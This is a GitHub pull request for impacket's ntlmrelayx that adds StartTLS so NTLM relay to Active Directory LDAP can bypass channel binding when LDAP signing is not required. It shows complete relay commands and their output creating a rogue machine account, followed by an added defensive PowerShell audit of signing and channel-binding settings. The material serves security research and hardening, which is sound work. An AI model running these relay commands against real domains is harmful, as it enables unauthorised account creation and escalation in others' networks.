
Implementing StartTLS #1305

Merged
merged 2 commits into from
Apr 29, 2022

Conversation

ThePirateWhoSmellsOfSunflowers
Contributor

@ThePirateWhoSmellsOfSunflowers ThePirateWhoSmellsOfSunflowers commented Apr 28, 2022

Hello all!

While doing research on LDAP client certificate authentication, I realized that the LDAP implementation of Active Directory supports the StartTLS mechanism, which has interesting implications for relay attacks.

TL;DR: Active Directory LDAP implements StartTLS and it can be used to bypass the Channel Binding requirement of LDAPS for some relay attacks such as the creation of a machine account if LDAP signing is not required by the domain controller.

More info in the accompanying blog post.

Example

Relaying to LDAPS with Channel Binding:

$ ntlmrelayx.py -t ldaps://172.20.15.209 --no-da --no-acl --no-validate-privs --add-computer 'OFFSECATTACK$' -smb2support --http-port 3128

[…]

[*] HTTPD: Received connection from 172.16.0.40, attacking target ldaps://172.20.15.209
[*] Authenticating against ldaps://172.20.15.209 as OFFSEC\LAP1337$ FAILED

With this PR, ntlmrelayx uses StartTLS and the attack works:

$ ntlmrelayx.py -t ldap://172.20.15.209 --no-da --no-acl --no-validate-privs --add-computer 'OFFSECATTACK$' -smb2support --http-port 8080

[…]

[*] HTTPD: Received connection from 172.16.0.40, attacking target ldap://172.20.15.209
[*] Authenticating against ldap://172.20.15.209 as OFFSEC\LAP1337$ SUCCEED
[*] Assuming relayed user has privileges to escalate a user via ACL attack
[-] Adding a machine account to the domain requires TLS but ldap:// scheme provided. Switching target to LDAPS via StartTLS
[*] Attempting to create computer in: CN=Computers,DC=offsec,DC=local
[*] Adding new computer with username: OFFSECATTACK$ and password: +v[;6Kiid>ir)Bd result: OK

Keep in mind that this bypass only works on domain controllers where LDAP signing is not required.

🌻
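The mitigation the description points at is LDAP signing set to "required" on the domain controller. The following is an added PowerShell audit, not part of this pull request or of impacket: run locally on a DC, it reads the two NTDS registry values behind the "Domain controller: LDAP server signing requirements" policy and the LdapEnforceChannelBinding setting, states whether the StartTLS path described above is closed, and lists recent event 2889 entries (unsigned SASL binds and cleartext simple binds), which is the population to survey before flipping signing to required. The function names and the `$Hours` parameter are this example's own; the registry paths and the event ID are Microsoft-documented.

```powershell
# Added example (not impacket code). Run in an elevated session on a domain controller.
$NtdsParams      = 'HKLM:\SYSTEM\CurrentControlSet\Services\NTDS\Parameters'
$NtdsDiagnostics = 'HKLM:\SYSTEM\CurrentControlSet\Services\NTDS\Diagnostics'

function Get-LdapHardeningState {
    # LDAPServerIntegrity:       0 or 1 = signing negotiated only, 2 = signing required
    # LdapEnforceChannelBinding: 0 = never, 1 = when supported, 2 = always
    # An absent value is reported as $null (server default) rather than guessed.
    $props   = Get-ItemProperty -Path $NtdsParams -ErrorAction Stop
    $signing = $props.LDAPServerIntegrity
    $cbt     = $props.LdapEnforceChannelBinding

    [pscustomobject]@{
        LDAPServerIntegrity       = $signing
        LdapEnforceChannelBinding = $cbt
        SigningRequired           = ($signing -eq 2)
        ChannelBindingAlways      = ($cbt -eq 2)
        # Per the PR description, StartTLS satisfies the "needs TLS" check without a
        # channel binding token, so channel binding alone does not stop it; only
        # required signing does.
        StartTlsRelayMitigated    = ($signing -eq 2)
    }
}

function Enable-LdapInterfaceEventLogging {
    # Event 2889 is only written when "16 LDAP Interface Events" is at least 2.
    Set-ItemProperty -Path $NtdsDiagnostics -Name '16 LDAP Interface Events' -Value 2 -Type DWord
}

function Get-UnsignedBindEvents {
    param([int]$Hours = 24)   # example's own parameter: look-back window
    # Event 2889 ("Directory Service" log): client IP:port, identity bound as,
    # and binding type (0 = SASL bind without signing, 1 = simple bind over cleartext).
    $filter = @{
        LogName   = 'Directory Service'
        Id        = 2889
        StartTime = (Get-Date).AddHours(-$Hours)
    }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        [pscustomobject]@{
            Time        = $_.TimeCreated
            Client      = $_.Properties[0].Value
            Identity    = $_.Properties[1].Value
            BindingType = $_.Properties[2].Value
        }
    }
}

# Usage: report the current state, then summarise which clients still bind unsigned.
$state = Get-LdapHardeningState
$state | Format-List
if (-not $state.StartTlsRelayMitigated) {
    Write-Warning 'LDAP signing is not required: the StartTLS relay path described in the PR is open.'
}
Get-UnsignedBindEvents -Hours 24 |
    Group-Object Client, Identity |
    Select-Object Count, Name |
    Sort-Object Count -Descending |
    Format-Table -AutoSize
```

The script changes nothing except when you call `Enable-LdapInterfaceEventLogging` yourself; that raises diagnostic logging so the 2889 survey has data, and is the usual first step before setting LDAPServerIntegrity to 2 via the "Domain controller: LDAP server signing requirements" group policy.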

@0xdeaddood 0xdeaddood added the "in review" label (This issue or pull request is being analyzed) Apr 28, 2022
@0xdeaddood
Collaborator

Great addition, merging. Thanks @ThePirateWhoSmellsOfSunflowers!

@0xdeaddood 0xdeaddood merged commit b37fd99 into fortra:master Apr 29, 2022
@0xdeaddood 0xdeaddood removed the "in review" label (This issue or pull request is being analyzed) Apr 29, 2022